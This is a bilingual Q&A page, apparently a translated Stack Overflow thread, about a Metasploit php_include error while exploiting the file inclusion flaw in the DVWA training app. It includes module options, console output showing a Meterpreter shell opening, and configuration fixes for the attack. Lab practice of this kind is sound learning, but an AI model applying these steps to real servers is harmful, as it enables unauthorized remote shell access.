[英]Metasploit php_include 'undefined method `remove_resource' for nil:NilClass'
I'm trying to exploit the dvwa File Inclusion vulnerability. 我正在尝试利用dvwa文件包含漏洞。 I'm refering to this tutorial: http://www.offensive-security.com/metasploit-unleashed/PHP_Meterpreter
我指的是本教程: http ://www.offensive-security.com/metasploit-unleashed/PHP_Meterpreter
When I run 'exploit', I get the following error: [-] Exploit failed: undefined method `remove_resource' for nil:NilClass 当我运行'exploit'时,出现以下错误:[-] Exploit失败:nil:NilClass的未定义方法`remove_resource'
The options I set: 我设置的选项:
msf exploit(php_include) > show options
Module options (exploit/unix/webapp/php_include):
Name Current Setting Required Description
---- --------------- -------- -----------
HEADERS no Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/david/msf/metasploit-framework/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI /dvwa/vulnerabilities/fi/?page=XXpathXX no The URI to request, with the include parameter changed to XXpathXX
POSTDATA no The POST data to send, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST 172.16.246.131 yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (php/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 172.16.246.131 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(php_include) > run
[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/ORFRTphN
[*] Local IP: http://10.8.0.10:8080/ORFRTphN
[*] PHP include server started.
[-] Exploit failed: undefined method `remove_resource' for nil:NilClass
Thanks for help! 感谢帮助!
This error also seems to appear when the exploit is successful: 成功利用漏洞后,似乎还会出现此错误:
msf exploit(php_include) > exploit
[*] Started reverse handler on 192.168.1.2:443
[*] Using URL: http://192.168.1.2:80/521eNu
[*] PHP include server started.
[*] Sending stage (39848 bytes) to 192.168.1.208
[*] Meterpreter session 1 opened (192.168.1.2:443 -> 192.168.1.208:32887) at 2014-06-01 20:44:15 +0100
[-] Exploit failed: undefined method `remove_resource' for nil:NilClass
meterpreter > getuid
Server username: apache (48)
Make sure that the PATH
and PHPURI
settings are set correctly. 确保正确设置了
PATH
和PHPURI
设置。 You may need them to be as follows: 您可能需要它们如下:
set PATH /dvwa/vulnerabilities/fi
set PHPURI /?page=XXpathXX
Check with Wireshark that the URL is sent as expected. 与Wireshark确认URL是否按预期发送。
Also, it could be that certain outbound ports are blocked, so experiment with different values. 另外,可能是某些出站端口被阻止,因此请尝试使用不同的值。
In the specific case of DVWA, you will need to pass the session cookie using the HEADERS
parameter. 在DVWA的特定情况下,您将需要使用
HEADERS
参数传递会话cookie。 Get this from your logged in browser session and then set as follows: 从登录的浏览器会话中获取此信息,然后进行如下设置:
set HEADERS cookie=PHPSESSIONID=....
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.